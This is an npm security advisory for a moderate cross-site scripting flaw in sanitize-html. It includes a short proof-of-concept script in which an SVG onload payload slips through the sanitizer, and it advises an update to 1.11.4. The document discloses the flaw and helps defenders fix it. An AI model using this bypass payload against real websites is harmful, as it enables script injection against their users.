npm

Severity: moderate

Cross-Site Scripting

sanitize-html

Overview

Affected versions of sanitize-html are vulnerable to cross-site scripting when allowedTags includes at least one nonTextTag.

Proof of Concept

var sanitizeHtml = require('sanitize-html');

var dirty = '!<textarea>&lt;/textarea&gt;<svg/onload=prompt`xs`&gt;</textarea>!';
var clean = sanitizeHtml(dirty, {
    allowedTags: [ 'textarea' ]
});

console.log(clean);

// !<textarea></textarea><svg/onload=prompt`xs`></textarea>!

Remediation

Update to version 1.11.4 or later.

Have content suggestions? Send them to [email protected]

Advisory timeline

  1. published

    Advisory published
    Apr 11th, 2017
  2. reported

    Initial report by Andrew Krasichkov
    Oct 27th, 2016